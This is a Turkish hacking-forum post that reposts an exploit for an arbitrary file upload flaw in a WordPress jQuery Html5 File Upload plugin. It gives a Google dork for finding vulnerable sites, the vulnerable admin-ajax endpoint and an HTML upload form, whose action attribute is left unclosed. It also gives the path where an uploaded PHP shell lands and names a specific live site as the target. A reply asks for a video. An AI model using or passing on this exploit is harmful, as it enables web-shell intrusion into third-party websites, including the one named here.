Wordpress jQuery Html5 Plugins File Upload Arbitrary File Upload Vulnerability

Katılım
18 Mar 2016
Tepki puanı
13
Rating - 0%
Güncel exploittir..

Kod:
#############################

# Exploit Title: Wordpress Plugins jQuery Html5 File Upload Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/jquery-html5-file-upload/
# Date: 2016-04-17
# Exploit Author: AnoaGhost
# Vendor Homepage: https://wordpress.org/plugins/jquery-html5-file-upload/
# Software Link: https://downloads.wordpress.org/plugin/jquery-html5-file-upload.3.0.zip
# Version: Any Version
# Tested on: Windows, Linux

#############################

Poc :
targe.com/wp-admin/admin-ajax.php?action=load_ajax_function

Exploit HTML :

<center>
<br><br><br><br><br><br><br><br><br><br><br><br><br>
<font face="Iceland" color="red" size="7">jQuery File Upload By AnoaGhost</font><br>
<form method="POST" action="target.com/
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>

Shell Access :
target.com/wp-content/uploads/files/guest/shell.php

Target :
http://students4students.us/wp-admin/admin-ajax.php?action=load_ajax_function

direk link;
 

CeKu

︶⋛⋋⊱⋋ ☾★ ⋌⊰⋌⋚︶
Katılım
14 Şub 2016
Tepki puanı
586
Konum
.
Rating - 0%
videosu varmı kardeşim
 
131,597Konular
3,269,519Mesajlar
315,514Kullanıcılar
g88iye0wmSon Üye
Üst Alt